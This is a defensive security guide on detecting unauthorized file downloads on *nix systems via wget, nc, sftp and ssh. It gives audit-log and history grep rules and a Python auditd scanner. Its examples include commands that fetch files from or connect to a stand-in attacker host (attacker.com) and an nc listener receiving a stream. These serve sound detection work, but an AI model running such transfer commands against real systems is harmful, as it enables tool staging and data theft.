# File Download

## File Download in \*nix Systems: Tools and Detection

Attackers frequently use standard \*nix utilities to download malicious tools or exfiltrate sensitive files. Below are common methods and detection strategies for identifying unauthorized file downloads.

***

## **Key Commands for File Download**

### **1. wget Command**

**Purpose**: Download files from web servers.

**Example**:

```bash
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget "$URL" -O "$LFILE"   # -O names the local file the download is written to
```

**Detection**:

* Focus on the **`-O`** parameter, which specifies the output file.
* Verify if the destination (IP/domain) is trusted.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  grep "wget" /var/log/audit/audit.log | grep -e "-O"
  ```
* **Command History**:

  ```bash
  history | grep "wget" | grep -e "-O"
  grep "wget" ~/.bash_history | grep -e "-O"
  ```
* **EDR/XDR Logs**: Inspect **wget** processes and associated network traffic for unauthorized connections.

### **2. nc (Netcat) Command**

**Purpose**: Transfer files using TCP or UDP.

**Example**:

*On the remote system*:

```bash
# Run after the listener below is up; streams the file to port 12345
nc target.com 12345 < "file_to_send"
```

*On the target system*:

```bash
LPORT=12345
LFILE=file_to_save
nc -l -p "$LPORT" > "$LFILE"   # listen and write the incoming stream to a file
```

**Detection**:

* Look for **`-l`** (listen mode) together with the **`>`** redirection operator to detect incoming file streams.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  grep -w "nc" /var/log/audit/audit.log | grep -e "-l"   # -w avoids matching words that merely contain "nc"
  ```
* **Command History**:

  ```bash
  history | grep -w "nc" | grep -e "-l"
  grep -w "nc" ~/.bash_history | grep -e "-l"
  ```
* **EDR/XDR Logs**: Analyze **nc** processes and network activity for unauthorized file transfers.

### **3. sftp Command**

**Purpose**: Secure file transfer over SSH.

**Example**:

```bash
RHOST=user@attacker.com
sftp "$RHOST"
# Entered at the sftp> prompt once connected:
get file_to_get file_to_save
```

**Detection**:

* Focus on **get** operations for file downloads.
* Verify the legitimacy of remote destinations.
* Note that **get** is typed at the `sftp>` prompt, so it appears neither in shell history nor as an EXECVE argument; the logs below show the **sftp** invocation and the remote host it connected to.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  grep "sftp" /var/log/audit/audit.log
  ```
* **Command History**:

  ```bash
  history | grep "sftp"
  grep "sftp" ~/.bash_history
  ```
* **EDR/XDR Logs**: Investigate **sftp** processes and network connections.

### **4. ssh Command**

**Purpose**: Execute remote commands, including file transfers.

**Example**:

```bash
HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh "$HOST" "cat $RPATH" > "$LPATH"   # remote cat, output redirected into a local file
```

**Detection**:

* Monitor the **`>`** operator in conjunction with remote file viewing commands like **cat**. The redirection is performed by the local shell, so it is visible in command history but not in the **ssh** process arguments recorded by auditd or EDR.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  grep "ssh" /var/log/audit/audit.log
  ```
* **Command History**:

  ```bash
  history | grep "ssh"
  grep "ssh" ~/.bash_history
  ```
* **EDR/XDR Logs**: Examine **ssh** process events and parameters for unauthorized file retrievals.

***

## **General Detection Strategies**

### **1. Monitor Known Tools**

* Regularly log and review commands like **wget**, **nc**, **sftp**, and **ssh**.
* Pay close attention to connections with external or suspicious domains.

### **2. Check Network Traffic**

* Analyze outbound connections, especially to untrusted IPs or domains.
* Use network monitoring tools to flag uncommon destinations or large data transfers.

### **3. Audit Logs**

* Regularly review **`/var/log/audit/audit.log`** for download-related commands.

### **4. Command History**

* Inspect history files for any download-related activities.

  ```bash
  CMD=wget   # or nc, sftp, ssh
  history | grep "$CMD"
  grep "$CMD" ~/.bash_history
  ```

### **5. EDR/XDR Telemetry**

* Utilize endpoint detection tools to:
  * Correlate process events with network connections.
  * Detect and flag unauthorized file transfer patterns.
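As an added example (not part of the original page or of GTFOBins), the following Python scanner applies the four audit-log checks above to auditd EXECVE records, including the hex encoding auditd uses for arguments that contain spaces. The sample records and the pattern labels are constructed for this demonstration.

```python
import re

# Constructed auditd EXECVE records in the real log format (not captured from a live host).
SAMPLE_AUDIT_LOG = """\
type=EXECVE msg=audit(1700000000.101:201): argc=4 a0="wget" a1="http://attacker.com/file_to_get" a2="-O" a3="file_to_save"
type=EXECVE msg=audit(1700000000.102:202): argc=2 a0="wget" a1="https://example.org/index.html"
type=EXECVE msg=audit(1700000000.103:203): argc=4 a0="nc" a1="-l" a2="-p" a3="12345"
type=EXECVE msg=audit(1700000000.104:204): argc=2 a0="sftp" a1="user@attacker.com"
type=EXECVE msg=audit(1700000000.105:205): argc=3 a0="ssh" a1="user@attacker.com" a2=6361742066696C655F746F5F676574
type=EXECVE msg=audit(1700000000.106:206): argc=2 a0="ls" a1="-la"
"""

# aN="..." for plain arguments; auditd hex-encodes arguments containing spaces or quotes (a2 above).
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-F]+))')

def parse_execve_args(record):
    """Return argv of one EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(record):
        args[int(idx)] = quoted if hexed == "" else bytes.fromhex(hexed).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]

def classify(argv):
    """Name the download pattern from this page that argv matches, or '' if none."""
    tool = argv[0].rsplit("/", 1)[-1] if argv else ""  # strip /usr/bin/-style prefixes
    opts = argv[1:]
    if tool == "wget" and "-O" in opts:
        return "wget with explicit output file (-O)"
    if tool == "nc" and "-l" in opts:
        return "nc listener (-l) receiving a file"
    if tool == "sftp":
        return "sftp session (review for get operations)"
    # The shell's '> file' redirect is not in ssh's argv, so audit shows only the remote cat; history shows the redirect.
    if tool == "ssh" and any(a.startswith("cat ") for a in opts):
        return "ssh running a remote cat (likely redirected into a local file)"
    return ""

def scan_audit_log(text):
    """Return (event id, command line, reason) for every EXECVE record that matches a pattern."""
    hits = []
    for line in text.splitlines():
        if "type=EXECVE" not in line:
            continue
        argv = parse_execve_args(line)
        reason = classify(argv)
        if reason:
            event = re.search(r"msg=audit\(([^)]*)\)", line).group(1)
            hits.append((event, " ".join(argv), reason))
    return hits
```

Pass the contents of `/var/log/audit/audit.log` to `scan_audit_log` to run the same checks against a real host; the event id lets you pull the matching SYSCALL record (uid, ppid, cwd) for triage.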

***

## **Key Points**

While utilities like **wget**, **nc**, **sftp**, and **ssh** serve legitimate purposes, they are often exploited for malicious file downloads. **Continuous monitoring**, combined with thorough log analysis and EDR/XDR telemetry, is essential to identify and mitigate these threats effectively. By proactively implementing these strategies, defenders can strengthen their security posture against unauthorized file transfer activities.
